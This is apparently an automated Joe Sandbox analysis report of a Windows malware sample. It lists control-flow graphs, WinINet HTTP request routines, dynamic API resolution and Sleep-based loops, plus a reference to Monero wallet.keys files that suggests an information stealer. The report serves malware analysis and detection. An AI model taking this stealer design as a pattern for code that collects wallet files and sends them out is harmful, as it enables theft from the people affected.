101a8a0 call 101a800 call 101a920 call 101a8a0 call 101a800 call 101a9b0 call 101a8a0 call 101a800 call 101a9b0 call 101a8a0 call 101a800 call 101a920 call 101a8a0 call 101a800 call 101a9b0 call 101a8a0 call 101a800 call 101a9b0 call 101a8a0 call 101a800 call 101a9b0 call 101a8a0 call 101a800 call 101a9b0 call 101a8a0 call 101a800 call 101a920 call 101a8a0 call 101a800 call 101a740 call 101a920 * 2 call 101a8a0 call 101a800 * 2 call 101aad0 lstrlen call 101aad0 * 2 lstrlen call 101aad0 HttpSendRequestA 908->909 910 1004ebe-1004ec5 InternetCloseHandle 908->910 1021 1004e32-1004e5c InternetReadFile 909->1021 910->819 1022 1004e67-1004eb9 InternetCloseHandle call 101a800 1021->1022 1023 1004e5e-1004e65 1021->1023 1022->910 1023->1022 1024 1004e69-1004ea7 call 101a9b0 call 101a8a0 call 101a800 1023->1024 1024->1021
                        APIs
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 010047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 01004839
                          • Part of subcall function 010047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 01004849
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 01004915
                        • StrCmpCA.SHLWAPI(?,0189EAC8), ref: 0100493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 01004ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,01020DDB,00000000,?,?,00000000,?,",00000000,?,0189E998), ref: 01004DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 01004E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 01004E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 01004E49
                        • InternetCloseHandle.WININET(00000000), ref: 01004EAD
                        • InternetCloseHandle.WININET(00000000), ref: 01004EC5
                        • HttpOpenRequestA.WININET(00000000,0189EA48,?,0189E020,00000000,00000000,00400100,00000000), ref: 01004B15
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                        • InternetCloseHandle.WININET(00000000), ref: 01004ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 460715078-2180234286
                        • Opcode ID: 586ec6a5dee9972e067c9a9b8feb389ad5849d5eabc64eef151188ecf3af525a
                        • Instruction ID: c54f1d55e5ad2456f9cd0afdce0d402fbf447548a8d12aff90752b5ec69d3a56
                        • Opcode Fuzzy Hash: 586ec6a5dee9972e067c9a9b8feb389ad5849d5eabc64eef151188ecf3af525a
                        • Instruction Fuzzy Hash: 67123C72A12159EADB15EB90DD90FEEB339BF24210F504199E54663094EF342F8ACF60
                        Function 01017850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,010011B7), ref: 01017880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01017887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0101789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: b962a07a4b34884c8a1e9f358ddbb965f7580308d8580313bc260be9af2c5bea
                        • Instruction ID: 8d7e40589b03863ab0aa2a6ac734e4c138d65d9a516581509c574bc702043ce1
                        • Opcode Fuzzy Hash: b962a07a4b34884c8a1e9f358ddbb965f7580308d8580313bc260be9af2c5bea
                        • Instruction Fuzzy Hash: 15F04FB5984208EBD714DF99D949BAEBBB8FB04711F10025AFA06A3684C77815048BA1
                        Function 01001160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: c853c6aa83039a919c81aa2a35cd3db17cc0e28d33498657d9365f25001945a8
                        • Instruction ID: 8fe325556ffe2037edbf470fa8b5ff1fe73a8db2323a5ca16e3d7e6f32afebf7
                        • Opcode Fuzzy Hash: c853c6aa83039a919c81aa2a35cd3db17cc0e28d33498657d9365f25001945a8
                        • Instruction Fuzzy Hash: 76D05E7894030CDBDB28DFE0E84D6DDBB78FB08311F000554E90763340EA30A481CBA5
                        Function 01019C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,01885870), ref: 01019C2D
                        • GetProcAddress.KERNEL32(74DD0000,018858B0), ref: 01019C45
                        • GetProcAddress.KERNEL32(74DD0000,01899628), ref: 01019C5E
                        • GetProcAddress.KERNEL32(74DD0000,01899640), ref: 01019C76
                        • GetProcAddress.KERNEL32(74DD0000,01899670), ref: 01019C8E
                        • GetProcAddress.KERNEL32(74DD0000,018996A0), ref: 01019CA7
                        • GetProcAddress.KERNEL32(74DD0000,0188BCC0), ref: 01019CBF
                        • GetProcAddress.KERNEL32(74DD0000,0189D1A0), ref: 01019CD7
                        • GetProcAddress.KERNEL32(74DD0000,0189D290), ref: 01019CF0
                        • GetProcAddress.KERNEL32(74DD0000,0189D3B0), ref: 01019D08
                        • GetProcAddress.KERNEL32(74DD0000,0189D230), ref: 01019D20
                        • GetProcAddress.KERNEL32(74DD0000,01885A90), ref: 01019D39
                        • GetProcAddress.KERNEL32(74DD0000,01885930), ref: 01019D51
                        • GetProcAddress.KERNEL32(74DD0000,01885A50), ref: 01019D69
                        • GetProcAddress.KERNEL32(74DD0000,01885970), ref: 01019D82
                        • GetProcAddress.KERNEL32(74DD0000,0189D1E8), ref: 01019D9A
                        • GetProcAddress.KERNEL32(74DD0000,0189D278), ref: 01019DB2
                        • GetProcAddress.KERNEL32(74DD0000,0188BD10), ref: 01019DCB
                        • GetProcAddress.KERNEL32(74DD0000,018859B0), ref: 01019DE3
                        • GetProcAddress.KERNEL32(74DD0000,0189D2D8), ref: 01019DFB
                        • GetProcAddress.KERNEL32(74DD0000,0189D218), ref: 01019E14
                        • GetProcAddress.KERNEL32(74DD0000,0189D128), ref: 01019E2C
                        • GetProcAddress.KERNEL32(74DD0000,0189D1B8), ref: 01019E44
                        • GetProcAddress.KERNEL32(74DD0000,018859D0), ref: 01019E5D
                        • GetProcAddress.KERNEL32(74DD0000,0189D110), ref: 01019E75
                        • GetProcAddress.KERNEL32(74DD0000,0189D2F0), ref: 01019E8D
                        • GetProcAddress.KERNEL32(74DD0000,0189D3E0), ref: 01019EA6
                        • GetProcAddress.KERNEL32(74DD0000,0189D158), ref: 01019EBE
                        • GetProcAddress.KERNEL32(74DD0000,0189D350), ref: 01019ED6
                        • GetProcAddress.KERNEL32(74DD0000,0189D3C8), ref: 01019EEF
                        • GetProcAddress.KERNEL32(74DD0000,0189D0F8), ref: 01019F07
                        • GetProcAddress.KERNEL32(74DD0000,0189D380), ref: 01019F1F
                        • GetProcAddress.KERNEL32(74DD0000,0189D248), ref: 01019F38
                        • GetProcAddress.KERNEL32(74DD0000,0189A240), ref: 01019F50
                        • GetProcAddress.KERNEL32(74DD0000,0189D1D0), ref: 01019F68
                        • GetProcAddress.KERNEL32(74DD0000,0189D140), ref: 01019F81
                        • GetProcAddress.KERNEL32(74DD0000,018859F0), ref: 01019F99
                        • GetProcAddress.KERNEL32(74DD0000,0189D320), ref: 01019FB1
                        • GetProcAddress.KERNEL32(74DD0000,01885A70), ref: 01019FCA
                        • GetProcAddress.KERNEL32(74DD0000,0189D308), ref: 01019FE2
                        • GetProcAddress.KERNEL32(74DD0000,0189D260), ref: 01019FFA
                        • GetProcAddress.KERNEL32(74DD0000,018856B0), ref: 0101A013
                        • GetProcAddress.KERNEL32(74DD0000,01885B10), ref: 0101A02B
                        • LoadLibraryA.KERNEL32(0189D368,?,01015CA3,01020AEB,?,?,?,?,?,?,?,?,?,?,01020AEA,01020AE3), ref: 0101A03D
                        • LoadLibraryA.KERNEL32(0189D200,?,01015CA3,01020AEB,?,?,?,?,?,?,?,?,?,?,01020AEA,01020AE3), ref: 0101A04E
                        • LoadLibraryA.KERNEL32(0189D338,?,01015CA3,01020AEB,?,?,?,?,?,?,?,?,?,?,01020AEA,01020AE3), ref: 0101A060
                        • LoadLibraryA.KERNEL32(0189D170,?,01015CA3,01020AEB,?,?,?,?,?,?,?,?,?,?,01020AEA,01020AE3), ref: 0101A072
                        • LoadLibraryA.KERNEL32(0189D398,?,01015CA3,01020AEB,?,?,?,?,?,?,?,?,?,?,01020AEA,01020AE3), ref: 0101A083
                        • LoadLibraryA.KERNEL32(0189D188,?,01015CA3,01020AEB,?,?,?,?,?,?,?,?,?,?,01020AEA,01020AE3), ref: 0101A095
                        • LoadLibraryA.KERNEL32(0189D2A8,?,01015CA3,01020AEB,?,?,?,?,?,?,?,?,?,?,01020AEA,01020AE3), ref: 0101A0A7
                        • LoadLibraryA.KERNEL32(0189D2C0,?,01015CA3,01020AEB,?,?,?,?,?,?,?,?,?,?,01020AEA,01020AE3), ref: 0101A0B8
                        • GetProcAddress.KERNEL32(75290000,01885C70), ref: 0101A0DA
                        • GetProcAddress.KERNEL32(75290000,0189D4B8), ref: 0101A0F2
                        • GetProcAddress.KERNEL32(75290000,01899118), ref: 0101A10A
                        • GetProcAddress.KERNEL32(75290000,0189D578), ref: 0101A123
                        • GetProcAddress.KERNEL32(75290000,01885CB0), ref: 0101A13B
                        • GetProcAddress.KERNEL32(73440000,0188B9A0), ref: 0101A160
                        • GetProcAddress.KERNEL32(73440000,01885D70), ref: 0101A179
                        • GetProcAddress.KERNEL32(73440000,0188BA68), ref: 0101A191
                        • GetProcAddress.KERNEL32(73440000,0189D4D0), ref: 0101A1A9
                        • GetProcAddress.KERNEL32(73440000,0189D4E8), ref: 0101A1C2
                        • GetProcAddress.KERNEL32(73440000,01885D90), ref: 0101A1DA
                        • GetProcAddress.KERNEL32(73440000,01885C90), ref: 0101A1F2
                        • GetProcAddress.KERNEL32(73440000,0189D548), ref: 0101A20B
                        • GetProcAddress.KERNEL32(752C0000,01885AB0), ref: 0101A22C
                        • GetProcAddress.KERNEL32(752C0000,01885C50), ref: 0101A244
                        • GetProcAddress.KERNEL32(752C0000,0189D3F8), ref: 0101A25D
                        • GetProcAddress.KERNEL32(752C0000,0189D488), ref: 0101A275
                        • GetProcAddress.KERNEL32(752C0000,01885BB0), ref: 0101A28D
                        • GetProcAddress.KERNEL32(74EC0000,0188B630), ref: 0101A2B3
                        • GetProcAddress.KERNEL32(74EC0000,0188B838), ref: 0101A2CB
                        • GetProcAddress.KERNEL32(74EC0000,0189D560), ref: 0101A2E3
                        • GetProcAddress.KERNEL32(74EC0000,01885E10), ref: 0101A2FC
                        • GetProcAddress.KERNEL32(74EC0000,01885B30), ref: 0101A314
                        • GetProcAddress.KERNEL32(74EC0000,0188BAB8), ref: 0101A32C
                        • GetProcAddress.KERNEL32(75BD0000,0189D470), ref: 0101A352
                        • GetProcAddress.KERNEL32(75BD0000,01885D50), ref: 0101A36A
                        • GetProcAddress.KERNEL32(75BD0000,01899248), ref: 0101A382
                        • GetProcAddress.KERNEL32(75BD0000,0189D440), ref: 0101A39B
                        • GetProcAddress.KERNEL32(75BD0000,0189D518), ref: 0101A3B3
                        • GetProcAddress.KERNEL32(75BD0000,01885DB0), ref: 0101A3CB
                        • GetProcAddress.KERNEL32(75BD0000,01885DF0), ref: 0101A3E4
                        • GetProcAddress.KERNEL32(75BD0000,0189D4A0), ref: 0101A3FC
                        • GetProcAddress.KERNEL32(75BD0000,0189D500), ref: 0101A414
                        • GetProcAddress.KERNEL32(75A70000,01885DD0), ref: 0101A436
                        • GetProcAddress.KERNEL32(75A70000,0189D410), ref: 0101A44E
                        • GetProcAddress.KERNEL32(75A70000,0189D530), ref: 0101A466
                        • GetProcAddress.KERNEL32(75A70000,0189D590), ref: 0101A47F
                        • GetProcAddress.KERNEL32(75A70000,0189D5A8), ref: 0101A497
                        • GetProcAddress.KERNEL32(75450000,01885D10), ref: 0101A4B8
                        • GetProcAddress.KERNEL32(75450000,01885C10), ref: 0101A4D1
                        • GetProcAddress.KERNEL32(75DA0000,01885AD0), ref: 0101A4F2
                        • GetProcAddress.KERNEL32(75DA0000,0189D428), ref: 0101A50A
                        • GetProcAddress.KERNEL32(6F070000,01885B90), ref: 0101A530
                        • GetProcAddress.KERNEL32(6F070000,01885E30), ref: 0101A548
                        • GetProcAddress.KERNEL32(6F070000,01885BF0), ref: 0101A560
                        • GetProcAddress.KERNEL32(6F070000,0189D458), ref: 0101A579
                        • GetProcAddress.KERNEL32(6F070000,01885CD0), ref: 0101A591
                        • GetProcAddress.KERNEL32(6F070000,01885AF0), ref: 0101A5A9
                        • GetProcAddress.KERNEL32(6F070000,01885CF0), ref: 0101A5C2
                        • GetProcAddress.KERNEL32(6F070000,01885C30), ref: 0101A5DA
                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0101A5F1
                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0101A607
                        • GetProcAddress.KERNEL32(75AF0000,0189CF90), ref: 0101A629
                        • GetProcAddress.KERNEL32(75AF0000,01899188), ref: 0101A641
                        • GetProcAddress.KERNEL32(75AF0000,0189CFC0), ref: 0101A659
                        • GetProcAddress.KERNEL32(75AF0000,0189CF78), ref: 0101A672
                        • GetProcAddress.KERNEL32(75D90000,01885B50), ref: 0101A693
                        • GetProcAddress.KERNEL32(6CFC0000,0189D080), ref: 0101A6B4
                        • GetProcAddress.KERNEL32(6CFC0000,01885BD0), ref: 0101A6CD
                        • GetProcAddress.KERNEL32(6CFC0000,0189CFA8), ref: 0101A6E5
                        • GetProcAddress.KERNEL32(6CFC0000,0189CFD8), ref: 0101A6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: HttpQueryInfoA$InternetSetOptionA
                        • API String ID: 2238633743-1775429166
                        • Opcode ID: 2bb53df6cdb39f958b8d5accb58a0486587db20279ca34fee1bf4cec30958e02
                        • Instruction ID: 49c03f442529e63270f1a11783e6ac5d64791f349e52215b94bba565ea7b234b
                        • Opcode Fuzzy Hash: 2bb53df6cdb39f958b8d5accb58a0486587db20279ca34fee1bf4cec30958e02
                        • Instruction Fuzzy Hash: 2A62FABD6C1240AFE778DFA8F98C96A3BF9F78C601714851AA60BC724CD6399441DF60
                        Function 01006280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1033 1006280-100630b call 101a7a0 call 10047b0 call 101a740 InternetOpenA StrCmpCA 1040 1006314-1006318 1033->1040 1041 100630d 1033->1041 1042 1006509-1006525 call 101a7a0 call 101a800 * 2 1040->1042 1043 100631e-1006342 InternetConnectA 1040->1043 1041->1040 1063 1006528-100652d 1042->1063 1044 1006348-100634c 1043->1044 1045 10064ff-1006503 InternetCloseHandle 1043->1045 1047 100635a 1044->1047 1048 100634e-1006358 1044->1048 1045->1042 1050 1006364-1006392 HttpOpenRequestA 1047->1050 1048->1050 1052 10064f5-10064f9 InternetCloseHandle 1050->1052 1053 1006398-100639c 1050->1053 1052->1045 1055 10063c5-1006405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 100639e-10063bf InternetSetOptionA 1053->1056 1058 1006407-1006427 call 101a740 call 101a800 * 2 1055->1058 1059 100642c-100644b call 1018940 1055->1059 1056->1055 1058->1063 1066 10064c9-10064e9 call 101a740 call 101a800 * 2 1059->1066 1067 100644d-1006454 1059->1067 1066->1063 1069 1006456-1006480 InternetReadFile 1067->1069 1070 10064c7-10064ef InternetCloseHandle 1067->1070 1074 1006482-1006489 1069->1074 1075 100648b 1069->1075 1070->1052 1074->1075 1079 100648d-10064c5 call 101a9b0 call 101a8a0 call 101a800 1074->1079 1075->1070 1079->1069
                        APIs
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 010047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 01004839
                          • Part of subcall function 010047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 01004849
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        • InternetOpenA.WININET(01020DFE,00000001,00000000,00000000,00000000), ref: 010062E1
                        • StrCmpCA.SHLWAPI(?,0189EAC8), ref: 01006303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 01006335
                        • HttpOpenRequestA.WININET(00000000,GET,?,0189E020,00000000,00000000,00400100,00000000), ref: 01006385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 010063BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 010063D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 010063FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0100646D
                        • InternetCloseHandle.WININET(00000000), ref: 010064EF
                        • InternetCloseHandle.WININET(00000000), ref: 010064F9
                        • InternetCloseHandle.WININET(00000000), ref: 01006503
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET
                        • API String ID: 3749127164-2509457195
                        • Opcode ID: ffdea09d929f93a287769b07a56d7340327a78f9a55d325d347db6b54f801f57
                        • Instruction ID: 0eda038fa3473e69295d09ec349d5511447c5845cb697d53667ed3a50aa5a6d4
                        • Opcode Fuzzy Hash: ffdea09d929f93a287769b07a56d7340327a78f9a55d325d347db6b54f801f57
                        • Instruction Fuzzy Hash: A1718E75A00218EBEB25DFA4DC48BEE77B9FB44700F108198F64A6B1C4DBB56A85CF50
                        Function 01015510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1090 1015510-1015577 call 1015ad0 call 101a820 * 3 call 101a740 * 4 1106 101557c-1015583 1090->1106 1107 1015585-10155b6 call 101a820 call 101a7a0 call 1001590 call 10151f0 1106->1107 1108 10155d7-101564c call 101a740 * 2 call 1001590 call 10152c0 call 101a8a0 call 101a800 call 101aad0 StrCmpCA 1106->1108 1124 10155bb-10155d2 call 101a8a0 call 101a800 1107->1124 1133 1015693-10156a9 call 101aad0 StrCmpCA 1108->1133 1137 101564e-101568e call 101a7a0 call 1001590 call 10151f0 call 101a8a0 call 101a800 1108->1137 1124->1133 1140 10157dc-1015844 call 101a8a0 call 101a820 * 2 call 1001670 call 101a800 * 4 call 1016560 call 1001550 1133->1140 1141 10156af-10156b6 1133->1141 1137->1133 1272 1015ac3-1015ac6 1140->1272 1144 10157da-101585f call 101aad0 StrCmpCA 1141->1144 1145 10156bc-10156c3 1141->1145 1165 1015991-10159f9 call 101a8a0 call 101a820 * 2 call 1001670 call 101a800 * 4 call 1016560 call 1001550 1144->1165 1166 1015865-101586c 1144->1166 1146 10156c5-1015719 call 101a820 call 101a7a0 call 1001590 call 10151f0 call 101a8a0 call 101a800 1145->1146 1147 101571e-1015793 call 101a740 * 2 call 1001590 call 10152c0 call 101a8a0 call 101a800 call 101aad0 StrCmpCA 1145->1147 1146->1144 1147->1144 1250 1015795-10157d5 call 101a7a0 call 1001590 call 10151f0 call 101a8a0 call 101a800 1147->1250 1165->1272 1167 1015872-1015879 1166->1167 1168 101598f-1015a14 call 101aad0 StrCmpCA 1166->1168 1174 10158d3-1015948 call 101a740 * 2 call 1001590 call 10152c0 call 101a8a0 call 101a800 call 101aad0 StrCmpCA 1167->1174 1175 101587b-10158ce call 101a820 call 101a7a0 call 1001590 call 10151f0 call 101a8a0 call 101a800 1167->1175 1197 1015a16-1015a21 Sleep 1168->1197 1198 1015a28-1015a91 call 101a8a0 call 101a820 * 2 call 1001670 call 101a800 * 4 call 1016560 call 1001550 1168->1198 1174->1168 1276 101594a-101598a call 101a7a0 call 1001590 call 10151f0 call 101a8a0 call 101a800 1174->1276 1175->1168 1197->1106 1198->1272 1250->1144 1276->1168
